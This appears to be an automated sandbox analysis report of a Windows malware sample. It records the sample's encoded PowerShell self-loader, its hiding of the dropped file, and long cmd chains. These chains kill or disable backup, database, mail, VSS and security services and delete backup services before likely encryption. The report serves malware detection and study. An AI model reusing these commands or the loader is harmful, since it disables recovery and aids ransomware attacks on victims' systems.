/IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs
        Source: cmd.exe, 00000008.00000003.2520155429.0000000002B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLic
        Source: cmd.exe, 00000008.00000003.2533615018.00000000027C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
        Source: cmd.exe, 00000008.00000003.2545712731.00000000027C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start "killer" cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_10-11128
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00406360 rdtsc 10_2_00406360
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004093F7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004093F7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004079B9 __EH_prolog3_GS,NtQuerySystemInformation,NtQuerySystemInformation,OpenProcess,GetCurrentProcess,DuplicateHandle,CloseHandle,CloseHandle,GetFileType,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CreateThread,GetCurrentProcessId,CloseHandle,CloseHandle,10_2_004079B9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004069AB GetUserDefaultLangID,LoadLibraryA,GetProcAddress,GetProcAddress,CreateThread,CreateThread,CloseHandle,CloseHandle,CreateThread,CloseHandle,CreateThread,CloseHandle,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleFileNameW,lstrlenW,lstrcpyW,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetModuleHandleW,RegisterClassW,CreateWindowExW,DeleteCriticalSection,DeleteCriticalSection,DeleteCriticalSection,DeleteCriticalSection,10_2_004069AB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040FB93 mov eax, dword ptr fs:[00000030h]10_2_0040FB93
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040CD2A mov eax, dword ptr fs:[00000030h]10_2_0040CD2A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00411065 GetProcessHeap,10_2_00411065
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004093F7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004093F7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040958D SetUnhandledExceptionFilter,10_2_0040958D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00408783 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00408783
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040C788 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0040C788
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess created: Base64 decoded start-sleep -seconds 20
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CloudService.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CatalogDataService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.BrokerService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CatalogDataService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CloudService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.BrokerService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Tomcat7w.exe /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM DDSoftPwsTomcat9.exe /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM U8SmartClient.exe /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h "C:\Users\user\Desktop\R1TftmQpuQ.bat".exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\R1TftmQpuQ.bat.exe "C:\Users\user\Desktop\R1TftmQpuQ.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAK4AKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwCuACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAZQBuAHQAcgB5AFAAbwBpAG4AdABNAGUAdABoAG8AZAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkALgBXAGgAZQByAGUAKAB7ACAAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAJwBXAHIAZwB2AGcAcAByACcAIAB9ACwAIAAnAEYAaQByAHMAdAAnACkALgBHAGUAdABNAGUAdABoAG8AZAAoACcATQBhAGkAbgAnACwAIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBCAGkAbgBkAGkAbgBnAEYAbABhAGcAcwBdACAAJwBTAHQAYQB0AGkAYwAsACAAUAB1AGIAbABpAGMALAAgAE4AbwBuAFAAdQBiAGwAaQBjACcAKQA7ACAAJABlAG4AdAByAHkAUABvAGkAbgB0AE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Bwmeldokiller.bat" "Jump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /IM Veeam.Backup.CloudService.exe & taskkill /F /IM Veeam.Backup.Manager.exe & taskkill /F /IM Veeam.Backup.MountService.exe & taskkill /F /IM Veeam.Backup.Service.exe & taskkill /F /IM Veeam.Backup.WmiServer.exe & taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe & taskkill /F /IM VeeamDeploymentSvc.exe & taskkill /F /IM VeeamNFSSvc.exe & taskkill /F /IM VeeamTransportSvc.exe & taskkill /F /IM sqlbrowser.exe & taskkill /F /IM sqlceip.exe & taskkill /F /IM sqlservr.exe & taskkill /F /IM sqlwriter.exe & taskkill /F /IM sqlagentc.exe & taskkill /F /IM ReportingServicesService.exe & taskkill /F /IM Ssms.exe & taskkill /F /IM fdhost.exe & taskkill /F /IM fdlauncher.exe & taskkill /F /IM MsDtsSrvr.exe & taskkill /F /IM msmdsrv.exe & taskkill /F /IM mysql.exe & taskkill /F /IM mysqld.exe & taskkill /F /IM w3wp.exe & taskkill /F /IM wsusservice.exe & taskkill /F /IM SageCSClient.exe & taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe & taskkill /F /IM Launchpad.exe & taskkill /F /IM dbsrv12.exe & taskkill /F /IM EXCEL.EXE & taskkill /F /IM OUTLOOK.EXE & taskkill /F /IM WINWORD.EXE & taskkill /F /IM OneDrive.exe & taskkill /F /IM TaskService.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkill /IM mpdwsvc.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete CobianBackup11 & @sc delete cbVSCService11 & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F & taskkill /F /IM store.exe & taskkill /F /IM MSExchangeMailboxReplication.exe & taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe & taskkill /F /IM MSExchangeThrottling.exe & taskkill /F /IM EdgeTransport.exe & taskkill /F /IM MSExchangeTransportLogSearch.exe & taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe & taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe & taskkill /F /IM DataCollectorSvc.exe & taskkill /F /IM Microsoft.Exchange.ServiceHost.exe & taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe & taskkill /F /IM MSExchangeMailboxAssistants.exe & taskkill /F /IM msexchangerepl.exe & taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe & taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe & taskkill /F /IM MsExchangeFDS.exe & taskkill /F /IM MSExchangeMailSubmission.exe & taskkill /F /IM MSExchangeTransport.exe & taskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"Jump to behavior
